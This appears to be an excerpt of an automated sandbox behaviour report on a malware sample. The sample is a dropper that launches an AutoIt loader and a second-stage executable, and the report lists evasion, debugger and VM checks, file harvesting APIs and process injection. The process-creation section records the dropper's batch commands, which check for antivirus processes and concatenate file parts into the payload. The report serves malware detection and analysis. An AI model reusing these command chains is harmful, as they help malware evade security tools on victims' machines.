Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Window / User API: threadDelayed 9487			Jump to behavior

Found evaded block containing many API calls

Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe

Evaded block: after key decision

Found evasive API chain (date check)

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Found large amount of non-executed APIs

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	API coverage: 1.5 %
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	API coverage: 6.9 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif TID: 8064	Thread sleep count: 501 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif TID: 8064	Thread sleep time: -356211s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif TID: 8064	Thread sleep count: 9487 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif TID: 8064	Thread sleep time: -6745257s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Last function: Thread delayed

Source: C:\Users\user\Desktop\M13W1o3scc.exe	Code function: 0_2_004062D5 FindFirstFileW,FindClose,	0_2_004062D5
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Code function: 0_2_00402E18 FindFirstFileW,	0_2_00402E18
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00114005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	15_2_00114005
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000BE26E Process32NextW,SetFileTime,GetFileAttributesW,FindFirstFileW,__floor_pentium4,GetShortPathNameW,DeleteFileW,__floor_pentium4,	15_2_000BE26E
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0011C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	15_2_0011C2FF
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0011494A GetFileAttributesW,FindFirstFileW,FindClose,	15_2_0011494A
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0011CD14 FindFirstFileW,FindClose,	15_2_0011CD14
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0011CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	15_2_0011CD9F
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0011F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	15_2_0011F5D8
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0011F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	15_2_0011F735
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0011FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	15_2_0011FA36
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00113CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	15_2_00113CE2
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	16_2_0040E430
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	16_2_004138B0
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	16_2_00414570
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	16_2_00414910
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	16_2_0040ED20
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	16_2_0040BE70
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	16_2_0040DE10
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	16_2_004016D0
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	16_2_0040DA80
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	16_2_00413EA0
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	16_2_0040F6B0
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022AE697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	16_2_022AE697
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022B3B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	16_2_022B3B17
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022B4B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	16_2_022B4B77
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022AEF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	16_2_022AEF87
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022B47D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	16_2_022B47D7
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022AE077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	16_2_022AE077
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022ADCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	16_2_022ADCE7
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022AC0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	16_2_022AC0D7
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022A1937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	16_2_022A1937
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022B4107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	16_2_022B4107
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022AF917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	16_2_022AF917

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_000C5D13 GetVersionExW,GetCurrentProcess,IsWow64Process,FreeLibrary,GetSystemInfo,GetSystemInfo,

15_2_000C5D13

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\773416\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\773416	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: Amcache.hve.19.dr	Binary or memory string: VMware
Source: Amcache.hve.19.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.19.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.19.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.19.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.19.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.19.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.19.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Welding.pif, 0000000F.00000002.4150963294.0000000001333000.00000004.00000020.00020000.00000000.sdmp, 478F.tmp.exe, 00000010.00000002.2258896880.0000000000859000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.19.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Welding.pif, 0000000F.00000002.4150963294.00000000012D8000.00000004.00000020.00020000.00000000.sdmp, 478F.tmp.exe, 00000010.00000002.2258896880.0000000000828000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(
Source: Amcache.hve.19.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.19.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.19.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.19.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.19.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.19.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.19.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.19.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.19.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.19.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.19.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.19.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: 478F.tmp.exe, 00000010.00000002.2258796788.00000000007CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Amcache.hve.19.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.19.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.19.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.19.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.19.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.19.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.19.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.19.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_001245D5 BlockInput,

15_2_001245D5

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_000D8E89 _memset,IsDebuggerPresent,

15_2_000D8E89

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

15_2_000E5CAC

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe

Code function: 16_2_004045C0 VirtualProtect ?,00000004,00000100,00000000

16_2_004045C0

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\M13W1o3scc.exe

Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_004062FC

Contains functionality to read the PEB

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00430EDF mov eax, dword ptr fs:[00000030h]	15_2_00430EDF
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_00419750 mov eax, dword ptr fs:[00000030h]	16_2_00419750
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_007E2CEF push dword ptr fs:[00000030h]	16_2_007E2CEF
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022A092B mov eax, dword ptr fs:[00000030h]	16_2_022A092B
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022B99B7 mov eax, dword ptr fs:[00000030h]	16_2_022B99B7
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022A0D90 mov eax, dword ptr fs:[00000030h]	16_2_022A0D90

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

15_2_001088CD

Enables debug privileges

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000DA354 SetUnhandledExceptionFilter,	15_2_000DA354
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000DA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_000DA385
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000F66CF GetSystemTimeAsFileTime,ResumeThread,IsValidCodePage,SetUnhandledExceptionFilter,TlsAlloc,TlsSetValue,GetStringTypeW,SetStdHandle,	15_2_000F66CF
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000F66DF GetSystemTimeAsFileTime,ResumeThread,IsValidCodePage,SetUnhandledExceptionFilter,TlsAlloc,TlsSetValue,GetStringTypeW,SetStdHandle,	15_2_000F66DF
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000BF6A0 CopySid,LogonUserW,GetSecurityDescriptorDacl,AddAce,ShellExecuteW,ExtractIconExW,SHGetDesktopFolder,SHCreateShellItem,SHBrowseForFolderW,ShellExecuteExW,DragQueryPoint,StringFromGUID2,CoCreateInstance,CoUninitialize,EncodePointer,GetSystemTimeAsFileTime,ResumeThread,IsValidCodePage,SetUnhandledExceptionFilter,TlsAlloc,TlsSetValue,GetStringTypeW,SetStdHandle,GetConsoleMode,RtlUnwind,FreeEnvironmentStringsW,SetEnvironmentVariableA,_memmove,	15_2_000BF6A0
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000BF6A0 CopySid,LogonUserW,GetSecurityDescriptorDacl,AddAce,ShellExecuteW,ExtractIconExW,SHGetDesktopFolder,SHCreateShellItem,SHBrowseForFolderW,ShellExecuteExW,DragQueryPoint,StringFromGUID2,CoCreateInstance,CoUninitialize,EncodePointer,GetSystemTimeAsFileTime,ResumeThread,IsValidCodePage,SetUnhandledExceptionFilter,TlsAlloc,TlsSetValue,GetStringTypeW,SetStdHandle,GetConsoleMode,RtlUnwind,FreeEnvironmentStringsW,SetEnvironmentVariableA,_memmove,	15_2_000BF6A0
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0042B383 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_0042B383
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00411483 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_00411483
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00411616 SetUnhandledExceptionFilter,	15_2_00411616
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_004108BA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	15_2_004108BA
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_0041AD48
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0041CEEA SetUnhandledExceptionFilter,	16_2_0041CEEA
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	16_2_0041B33A
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022BAFAF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_022BAFAF
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022BD151 SetUnhandledExceptionFilter,	16_2_022BD151
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022BB5A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	16_2_022BB5A1

Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: 478F.tmp.exe PID: 8096, type: MEMORYSTR

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Memory written: C:\Users\user\AppData\Local\Temp\773416\Welding.pif base: 400000 value starts with: 4D5A

Jump to behavior

Searches for specific processes (likely to inject)

Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		16_2_00419600
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022B9867 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		16_2_022B9867

Contains functionality to execute programs as a different user

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_00109369 LogonUserW,

15_2_00109369

Contains functionality to launch a program with higher privileges

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_000C5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

15_2_000C5240

Contains functionality to simulate keystroke presses

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_00111AC6 SendInput,keybd_event,

15_2_00111AC6

Contains functionality to simulate mouse events

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

15_2_000BEC83

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\M13W1o3scc.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Halo Halo.bat & Halo.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 773416	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "MineralAlertSignificantVanilla" Partition	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Transmit + ..\Turtle + ..\Vienna + ..\Diet + ..\Enclosure + ..\Bangladesh + ..\Mobility + ..\Cool + ..\Completely A	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\773416\Welding.pif Welding.pif A	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Process created: C:\Users\user\AppData\Local\Temp\773416\Welding.pif C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Process created: C:\Users\user\AppData\Local\Temp\478F.tmp.exe "C:\Users\user\AppData\Local\Temp\478F.tmp.exe"	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

15_2_001088CD

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_00114F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

15_2_00114F1C

Source: M13W1o3scc.exe, 00000000.00000003.1693698599.0000000002896000.00000004.00000020.00020000.00000000.sdmp, Welding.pif, 0000000A.00000000.1728038915.0000000000166000.00000002.00000001.01000000.00000007.sdmp, Welding.pif, 0000000F.00000000.2027440522.0000000000166000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Welding.pif	Binary or memory string: Shell_TrayWnd

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_000D885B cpuid

15_2_000D885B

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: EnumSystemLocalesW,	15_2_00436121
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	15_2_0043C35A
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: GetLocaleInfoW,	15_2_00436514
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: EnumSystemLocalesW,	15_2_0043C5D2
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: EnumSystemLocalesW,	15_2_0043C61D
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: EnumSystemLocalesW,	15_2_0043C6B8
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	15_2_0043C745
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: GetLocaleInfoW,	15_2_0043C995
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	15_2_0043CABE
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: GetLocaleInfoW,	15_2_0043CBC5
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	15_2_0043CC92
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	16_2_00417B90
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	16_2_022B7DF7

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_000F0030 GetLocalTime,__swprintf,

15_2_000F0030

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_000F0722 GetUserNameW,

15_2_000F0722

